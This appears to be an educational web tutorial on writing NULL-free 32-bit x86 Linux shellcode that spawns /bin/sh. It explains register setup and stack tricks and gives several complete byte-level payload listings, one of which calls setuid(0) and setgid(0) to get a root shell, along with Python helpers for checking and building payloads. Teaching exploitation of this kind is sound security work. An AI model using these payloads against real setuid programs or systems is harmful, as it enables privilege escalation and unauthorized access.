Shellcode | BinaryMagi Inc.

DISCLAIMER: I'm not responsible for anything stupid you do with this information. This is for educational purposes only!

Shellcode is an exploit payload meant to produce a command shell for the attacker. The most common use is exploiting setuid programs to produce a root shell; however, in many cases any shell at all is further than one is meant to be allowed to go.

The standard shellcode is effectively the equivalent of:

   execve("/bin/sh", ["/bin/sh"], []);

There are catches, though:

Absolutely no NULL bytes (value 0x00) may be present. A NULL byte denotes the end of a C string, so it will usually cause the shellcode to be only partially transferred into where it needs to go. strcpy(), for example, is an easily exploitable function; however, it stops copying as soon as it encounters a NULL. (Other input functions have their own forbidden bytes: gets(), for instance, reads straight through a NULL but stops at a newline, 0x0a.)
As few instructions as possible. The smaller the code, the more likely you'll be able to wedge it into where it needs to go. (Small strings, GOTs, etc.) Some delivery methods multiply the size of the shellcode by several times so every byte counts.
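
Both catches are easy to check mechanically before worrying about anything else. Below is a minimal Python sketch, not part of the original write-up; the helper names `surviving_prefix` and `nul_offsets` are made up for illustration. It models what a C string copy would actually transfer and where the offending bytes sit.

```python
def surviving_prefix(payload):
    """Bytes a C string copy would transfer: everything before the first 0x00."""
    return payload.split(b"\x00", 1)[0]


def nul_offsets(payload):
    """Offsets of every 0x00 byte in the payload (empty list means clean)."""
    return [i for i, b in enumerate(payload) if b == 0]


# xor %eax,%eax ; cdq  -> 31 c0 99, no zero bytes
clean = bytes.fromhex("31c099")

# mov $0x0,%eax ; cdq  -> b8 00 00 00 00 99, four zero bytes
dirty = bytes.fromhex("b80000000099")

if __name__ == "__main__":
    for name, code in (("clean", clean), ("dirty", dirty)):
        print(name, len(code), nul_offsets(code), surviving_prefix(code).hex())
```

With the second byte string, only the first opcode byte would survive the copy, which is the "partially transferred" failure described above.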

These are the target values for the registers:

%eax	This should equal 0x0b, which is the syscall number for execve(). Setting just %al=0x0b is only enough if the upper 3 bytes of %eax are already zero, because the kernel reads the whole 32-bit register.
%ebx	The value of %esp after you've pushed the /bin/sh string onto the stack. This is where the 1st function parameter is stored which is a string pointer to the execution target.
%ecx	The second parameter is an array of arguments to pass to the execution target. /bin/sh doesn't need any; however, argv[0] is supposed to contain the name of the execution target itself so we still need a single value array. We can cheat, though, and reuse the address to the string in %ebx. 0x00 sometimes works but it's not POSIX and inconsistent across platforms. That being said, if you can use it, you can trim a few bytes off.
%edx	The third parameter is an array of environment variable values. You can set this one to 0x00 too; Linux treats a NULL here as an empty environment, but that behavior is nonstandard and what other platforms do is a big unknown. Instead, it's better to put the stack address of a NULL value in here. It should be safe to reuse the one you used to terminate the string used by the %ebx and %ecx parameters.

Most shellcode accomplishes this with the same basic steps:

1. Zero Out Registers Without Using Zeros

Zeroing out a register is tricky since we can't have any NULL bytes in our resulting opcodes. There are a few tricks out there to do this.

The first and most simple is XORing a register with itself. This works on any of the registers.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself always yields 0's

That's 2 bytes per register. There are some ways you can trim that, though. This way first purges %ecx and then multiplies %eax by it, which writes the 64-bit result into the pseudo-register %edx:%eax. Anything times zero is zero, so that's 3 clean registers in only 4 bytes of code.

 31 c9    xor %ecx,%ecx   ;; XOR %ecx with itself => 0
 f7 e1    mul %ecx        ;; %edx:%eax := %eax * %ecx => 0
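
To see why the multiply clears both registers regardless of what they held before, here is a small Python model of the one-operand `mul`. It is only a sketch of the arithmetic; `mul32` is a made-up name and nothing here touches real registers.

```python
MASK32 = 0xFFFFFFFF


def mul32(eax, operand):
    """Model of one-operand `mul`: unsigned eax * operand, returned as (edx, eax)."""
    product = (eax & MASK32) * (operand & MASK32)
    return (product >> 32) & MASK32, product & MASK32


if __name__ == "__main__":
    # Whatever garbage was in %eax, multiplying by a zeroed %ecx clears the pair.
    print(mul32(0xDEADBEEF, 0))
    # With a non-zero operand the high half spills into %edx instead.
    print(mul32(0xFFFFFFFF, 2))
```

The old value of %edx never enters the calculation; it is simply overwritten with the high half of the product.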

You don't need to zero out all 4 registers, though. Only %eax absolutely needs it - any others are just for convenience. For example, cdq sign-extends %eax into %edx, treating %edx:%eax as one 64-bit value, so once %eax is zero you can purge %edx with just 1 more byte: 3 bytes in total instead of 4. This only works for these 2 registers but it's really all you need.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself
 99       cdq             ;; Extend sign bit in %eax (0) through %edx
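
The cdq trick depends entirely on the top bit of %eax. A tiny Python model makes the condition explicit; this is a sketch of the instruction's effect on %edx only, and `cdq` here is just a local function name.

```python
def cdq(eax):
    """Model of `cdq`: the value %edx receives, i.e. the sign bit of %eax replicated."""
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


if __name__ == "__main__":
    print(hex(cdq(0x00000000)))  # %eax zeroed first, so %edx becomes 0
    print(hex(cdq(0x0000000B)))  # any value with the top bit clear also works
    print(hex(cdq(0x80000000)))  # top bit set: %edx fills with ones instead
```

So cdq is only a safe way to clear %edx after %eax is known to hold zero or a small positive value.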

An especially creative method I've found also works only for %eax and %edx but it combines purging them with setting %eax to its eventual value - all in only 4 bytes.

 6a 0b    push $0x0b      ;; push execve() onto the stack
 58       pop %eax        ;; eax := execve()
 99       cdq             ;; edx := 0

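By pushing & popping from the stack, the higher 3 bytes of the register are automatically flushed out: push with a 1-byte operand sign-extends it to 32 bits, so any value below 0x80 lands on the stack padded with 0's. cdq then extends those 0's all the way up through %edx.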
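
The push/pop trick works because the 2-byte form of push (opcode 6a) sign-extends its 1-byte operand to 32 bits. The Python sketch below models just that widening step; `push_imm8_value` is a hypothetical helper name.

```python
def push_imm8_value(imm8):
    """32-bit value that `push imm8` (opcode 6a) places on the stack in 32-bit mode."""
    if not 0 <= imm8 <= 0xFF:
        raise ValueError("imm8 must fit in one byte")
    # Bit 7 is the sign bit; when set, the upper 24 bits become ones.
    return imm8 | 0xFFFFFF00 if imm8 & 0x80 else imm8


if __name__ == "__main__":
    print(hex(push_imm8_value(0x0B)))  # upper bytes are zero
    print(hex(push_imm8_value(0x61)))  # same for 'a'
    print(hex(push_imm8_value(0x80)))  # upper bytes are 0xff, not zero
```

For 0x0b this yields a clean 32-bit value, but the same trick would not zero the upper bytes for any operand of 0x80 or above.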

Again, we only absolutely need to purge %eax. The others should eventually contain memory addresses and can therefore be populated by instructions that affect all 32 bits of the register. While populating the stack, though, we will need something with NULL bytes in it to refer to since we cannot include any NULLs in the shellcode itself. This final code block is a good example of why we may want to purge more than just %eax. If we don't purge %edx as well, we would need to wait until the very end of the shellcode to set %eax to its eventual value. By then, however, we couldn't pop it from the stack anymore because there would then be a lot of other stuff on top.

2. Set Appropriate Register & Stack Values

%eax

If you still wish to set %eax at an arbitrary time, this would do it. It must be zeroed out first, though.

 31 c0    xor %eax,%eax   ;; XOR %eax with itself
    ...arbitrary operations here - just don't mess up %eax...
 b0 0b    mov $0x0b,%al   ;; eax := execve()

If we tried to just set all 32 bits of %eax to 0x0b instead of flushing it 1st and then setting only %al, not only would it be more bytes but it would also include the 3 NULLs needed to pad out the higher bytes of the register. The former may just be unfortunate but the latter is a deal breaker. This is a good example of why standard compilers are inappropriate for developing shellcode - neither is an issue with regular code.
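
The difference between the two encodings can be shown by building them by hand. This is a minimal Python sketch using the standard x86 encodings b8 (mov imm32 into %eax) and b0 (mov imm8 into %al); the function names are made up for illustration.

```python
import struct


def mov_imm32_eax(value):
    """Encode `mov $value,%eax`: opcode b8 followed by a 4-byte little-endian immediate."""
    return b"\xb8" + struct.pack("<I", value)


def mov_imm8_al(value):
    """Encode `mov $value,%al`: opcode b0 followed by a 1-byte immediate."""
    return b"\xb0" + struct.pack("<B", value)


if __name__ == "__main__":
    for code in (mov_imm32_eax(0x0B), mov_imm8_al(0x0B)):
        print(code.hex(" "), "size:", len(code), "zero bytes:", code.count(0))
```

The 32-bit form is 5 bytes with 3 zero bytes of padding; the 8-bit form is 2 bytes with none, at the cost of needing %eax zeroed beforehand.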

%ebx

The 1st parameter to execve() nearly always looks the same - a call to /bin/sh as that is the only shell that convention guarantees to be there. We need to be careful of our NULL bytes, though, so we need string lengths that are multiples of 4 and the string-terminating NULL to come from one of our purged registers. Fortunately UNIX doesn't care about redundant slashes so we'll bulk that out to '/bin//sh' instead. ('//bin/sh' works just as well)

 52               push %edx          ;; push some register containing \0 (in this case %edx) onto the stack
 68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
 68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack

The order is backwards because it's a stack. The string-terminating NULL is pushed on from a register that we zeroed out earlier. Basically, you can call any shell you wish so long as the path string length is a multiple of 4 and this is trivial to do because you can have as many redundant slashes as you need.
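
Working out the push operands by hand is error-prone, so here is a short Python sketch that derives them from a path. The helpers `pad_path` and `push_immediates` are hypothetical; padding by repeating the leading slash is just one choice (it yields '//bin/sh' rather than '/bin//sh').

```python
import struct


def pad_path(path):
    """Pad an absolute path to a multiple of 4 bytes by repeating its leading slash."""
    raw = path.encode("ascii")
    if not raw.startswith(b"/"):
        raise ValueError("expected an absolute path")
    return b"/" * (-len(raw) % 4) + raw


def push_immediates(path):
    """32-bit operands for the push instructions, in the order they are pushed."""
    padded = pad_path(path)
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    # The last 4 characters go on the stack first; each chunk is read little-endian.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


if __name__ == "__main__":
    for p in ("/bin//sh", "/bin/sh"):
        print(p, pad_path(p), [hex(v) for v in push_immediates(p)])
```

For '/bin//sh' this reproduces the two operands used in the listing above.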

Once the string is onto the stack, its address is stored in %ebx. This is equivalent to passing in a pointer to a string in C.

 89 e3     mov %esp,%ebx   ;; ebx := pointer to "/bin//sh" on stack

%ecx / %edx

The 2nd and 3rd parameters in %ecx and %edx aren't really important and can often just be NULL; however, this violates POSIX and sometimes won't work. If you're on a system where NULL does work then it's trivial to zero them out. Otherwise, you can creatively use what has already been pushed onto the stack to populate them.

Parameter 2 is the argv array. An array is just a list of memory addresses terminated with a NULL. Our array is just ["/bin/sh"] though - argv[0] with no parameters - so we can create an array that reuses the string stored in %ebx for the 1st parameter.

 52        push %edx       ;; push some register containing \0 (in this case %edx) onto stack
 53        push %ebx       ;; push pointer to "/bin//sh" onto stack
 89 e1     mov %esp,%ecx   ;; ecx := pointer to argv array on stack

In fact, while we're at it, the 3rd parameter is even easier - it's just an empty array. We can use the terminating NULL at the end of the 2nd parameter's array and pretend it's a 3rd, empty array for %edx. It needs to happen before we push the address to the string onto the stack, though, or the stack pointer will move. The code above becomes:

 52        push %edx       ;; push some register containing \0 (in this case %edx) onto stack
 89 e2     mov %esp,%edx   ;; edx := pointer to empty array on stack
 53        push %ebx       ;; push pointer to "/bin//sh" onto stack
 89 e1     mov %esp,%ecx   ;; ecx := pointer to argv array on stack

Those 2 extra bytes hand execve() a proper empty environment array instead of relying on however the platform happens to treat a NULL pointer.
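
It can help to see where the three pointers end up. The following Python sketch replays the pushes against a toy stack; the starting address 0xBFFFF000 and the `Stack` class are assumptions made purely for illustration.

```python
import struct


class Stack:
    """Toy model of a downward-growing 32-bit stack."""

    def __init__(self, esp=0xBFFFF000):  # hypothetical starting address
        self.esp = esp
        self.mem = {}

    def push(self, value):
        self.esp -= 4
        self.mem[self.esp] = value & 0xFFFFFFFF

    def cstring(self, addr):
        """Read a NUL-terminated string starting at a 4-byte-aligned stack slot."""
        out = b""
        while True:
            word = struct.pack("<I", self.mem[addr])
            end = word.find(b"\x00")
            if end != -1:
                return out + word[:end]
            out += word
            addr += 4


def build_stack():
    s = Stack()
    edx = 0                 # zeroed earlier
    s.push(edx)             # string terminator
    s.push(0x68732F2F)      # "//sh"
    s.push(0x6E69622F)      # "/bin"
    ebx = s.esp             # pointer to "/bin//sh"
    s.push(edx)             # NULL: ends argv, doubles as the empty envp
    edx = s.esp             # pointer to the empty array
    s.push(ebx)             # argv[0]
    ecx = s.esp             # pointer to argv
    return s, ebx, ecx, edx


if __name__ == "__main__":
    s, ebx, ecx, edx = build_stack()
    print(s.cstring(ebx), hex(ebx), hex(ecx), hex(edx))
```

In this model %edx ends up exactly 4 bytes above %ecx, pointing at the same NULL that terminates the argv array.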

3. Execute execve()

With all 4 registers properly filled and the required parameter data on the stack, the final step is to execute.

 cd 80     int $0x80

This executes a software interrupt. The kernel then looks in %eax to see which system call is being requested - in our case execve() - and runs it. Valid values for %eax on 32-bit x86 Linux can be found in /usr/include/asm/unistd_32.h
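
The header is a flat list of `#define __NR_name number` lines, so looking up a value is simple to script. The Python sketch below parses an embedded sample rather than the real file (whose location can differ between distributions); `parse_syscalls` is a made-up helper name.

```python
import re

# Three lines in the format used by unistd_32.h, embedded so the sketch
# does not depend on the header being installed.
SAMPLE = """\
#define __NR_execve 11
#define __NR_setuid 23
#define __NR_setgid 46
"""


def parse_syscalls(text):
    """Map syscall name -> number from `#define __NR_<name> <number>` lines."""
    table = {}
    for match in re.finditer(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", text, re.MULTILINE):
        table[match.group(1)] = int(match.group(2))
    return table


if __name__ == "__main__":
    for name, number in parse_syscalls(SAMPLE).items():
        print(f"{name}: {number} (0x{number:02x})")
```

To use it against a real system, pass the contents of the header file instead of `SAMPLE`.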

Examples

Only the first 2 of these are my own - the rest were written by others. My apologies for not giving them credit but rarely do you find a shellcode example whose author makes his- or herself known.

A simple, POSIX-compliant example. Result is 25 bytes long.

;; execve("/bin//sh", ["/bin//sh"], []);
6a 0b            push $0x0b         ;; push execve() onto the stack
58               pop %eax           ;; eax := execve()
99               cdq                ;; edx := 0
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
52               push %edx          ;; push \0 onto stack
89 e2            mov %esp,%edx      ;; edx := pointer to empty array on stack
53               push %ebx          ;; push pointer to "/bin//sh" onto stack
89 e1            mov %esp,%ecx      ;; ecx := pointer to argv array on stack
cd 80            int $0x80          ;; FIRE!
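
The byte count and the no-NULL rule can be verified straight from a listing in this format. Here is a rough Python sketch that pulls the hex column out of each line; the regular expression assumes lowercase hex pairs separated by single spaces, as used on this page, and `listing_bytes` is a hypothetical name.

```python
import re

LISTING = """\
6a 0b            push $0x0b
58               pop %eax
99               cdq
52               push %edx
68 2f 2f 73 68   push $0x68732f2f
68 2f 62 69 6e   push $0x6e69622f
89 e3            mov %esp,%ebx
52               push %edx
89 e2            mov %esp,%edx
53               push %ebx
89 e1            mov %esp,%ecx
cd 80            int $0x80
"""


def listing_bytes(text):
    """Concatenate the leading hex column of every listing line."""
    out = bytearray()
    for line in text.splitlines():
        match = re.match(r"\s*((?:[0-9a-f]{2} )+)", line)
        if match:  # comment lines and blank lines have no hex column
            out += bytes.fromhex(match.group(1))
    return bytes(out)


if __name__ == "__main__":
    code = listing_bytes(LISTING)
    print(len(code), "bytes, zero bytes present:", 0 in code)
```

The same check can be pointed at any of the other listings here by swapping the text in `LISTING`.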

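Fully POSIX-compliant and includes setuid() and setgid() calls. It will segfault if run as any user but root: a failed setuid() leaves a negative error code in %eax, so the later writes to %al no longer produce valid syscall numbers. Result is 37 bytes.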

31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0

;; setuid(0);
b0 17            mov $0x17,%al      ;; eax := setuid
89 cb            mov %ecx,%ebx      ;; ebx := 0
cd 80            int $0x80          ;; FIRE 1!

;; setgid(0);
b0 2e            mov $0x2e,%al      ;; eax := setgid
cd 80            int $0x80          ;; FIRE 2!

;; execve("/bin//sh", ["/bin//sh"], []);
b0 0b            mov $0x0b,%al      ;; eax := execve
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
52               push %edx          ;; push \0 onto stack
89 e2            mov %esp,%edx      ;; edx := pointer to empty array on stack
53               push %ebx          ;; push pointer to "/bin//sh" onto stack
89 e1            mov %esp,%ecx      ;; ecx := pointer to argv array on stack
cd 80            int $0x80          ;; FIRE 3!!!
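
The reason this listing depends on setuid() succeeding is that it only ever rewrites %al after the first call. A Python model of the register arithmetic follows; it assumes the usual Linux convention of returning a negated errno in %eax on failure, and the helper names are made up.

```python
MASK32 = 0xFFFFFFFF
EPERM = 1  # errno for "Operation not permitted"


def set_al(eax, imm8):
    """Model of `mov $imm8,%al`: replace only the lowest byte of %eax."""
    return (eax & 0xFFFFFF00) | (imm8 & 0xFF)


def eax_for_setgid(setuid_result):
    """%eax as seen by the second int $0x80, given what setuid() returned."""
    return set_al(setuid_result & MASK32, 0x2E)


if __name__ == "__main__":
    print(hex(eax_for_setgid(0)))       # setuid succeeded: a valid syscall number
    print(hex(eax_for_setgid(-EPERM)))  # setuid failed: upper bytes are 0xff
```

When the first call fails, %eax no longer holds a valid syscall number for either of the later interrupts, so no shell is spawned and execution runs off the end of the code.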

Simple. Mostly complete but not POSIX. Result is 21 bytes.

;; execve("/bin//sh", NULL, NULL);
6a 0b            push $0x0b         ;; push execve onto stack
58               pop %eax           ;; eax := execve
99               cdq                ;; edx := 0
52               push %edx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
31 c9            xor %ecx,%ecx      ;; ecx := 0
cd 80            int $0x80          ;; FIRE!

The same idea as the previous one, but it zeroes the registers with xor/mul instead of push/pop/cdq. Mostly complete but not POSIX. Result is 21 bytes.

;; execve("/bin//sh", NULL, NULL);
31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0
b0 0b            mov $0x0b,%al      ;; eax := execve
51               push %ecx          ;; push \0 onto stack
68 2f 2f 73 68   push $0x68732f2f   ;; push "hs//" onto stack
68 2f 62 69 6e   push $0x6e69622f   ;; push "nib/" onto stack
89 e3            mov %esp,%ebx      ;; ebx := pointer to "/bin//sh" on stack
cd 80            int $0x80          ;; FIRE!

Meant for raw size. The result is only 14 bytes but it requires that a file named 'a' already exist in the current working directory of the exploited process, since execve() does not search the PATH. (upload a binary via FTP, create a symlink via a shell, etc.) Rather than calling '/bin/sh', it simply calls 'a' which has been somehow connected to a shell binary.

;; execve("a", NULL, NULL);
31 c9            xor %ecx,%ecx      ;; ecx := 0
f7 e1            mul %ecx           ;; eax := 0 & edx := 0
50               push %eax          ;; \0 onto stack
6a 61            push $0x61         ;; 'a' onto stack
89 e3            mov %esp,%ebx      ;; ebx := stack addr for "a"
50               push %eax          ;; \0 onto stack
b0 0b            mov $0x0b,%al      ;; eax := execve
cd 80            int $0x80          ;; FIRE!

This one reuses an existing string containing "/bin/sh" somewhere in the .rodata of the exploitable binary. The result is 16 bytes and requires no ability to push files, create symlinks, etc.; however, it does require that you know exactly where inside the binary the string resides and that the address of that string not contain any NULL bytes.

;; execve(*(0x08048408), [*(0x08048408)], NULL);
31 c0            xor %eax,%eax          ;; eax := 0
99               cdq                    ;; edx := 0
bb 08 84 04 08   mov $0x08048408,%ebx   ;; ebx := addr to string in .rodata containing "/bin/sh" - change it
50               push %eax              ;; \0 onto stack
53               push %ebx              ;; addr to "/bin/sh" onto stack
89 e1            mov %esp,%ecx          ;; ecx := pointer to argv array in stack
b0 0b            mov $0x0b,%al          ;; eax := execve
cd 80            int $0x80              ;; FIRE!
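
Whether a given address is usable here comes down to its 4 little-endian bytes. The Python sketch below encodes the mov and tests an address for zero bytes; `mov_imm32_ebx` and `address_is_usable` are hypothetical helper names, and 0x08048400 is only a made-up counterexample.

```python
import struct


def mov_imm32_ebx(addr):
    """Encode `mov $addr,%ebx`: opcode bb followed by the little-endian address."""
    return b"\xbb" + struct.pack("<I", addr)


def address_is_usable(addr):
    """True when none of the 4 address bytes is 0x00."""
    return 0 not in struct.pack("<I", addr)


if __name__ == "__main__":
    for addr in (0x08048408, 0x08048400):
        print(hex(addr), mov_imm32_ebx(addr).hex(" "), address_is_usable(addr))
```

An address that fails the check cannot be embedded directly as the operand of this instruction.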

The key is to be creative - think of it as a lateral thinking puzzle and see how many different ways there are to accomplish the same thing. Have fun!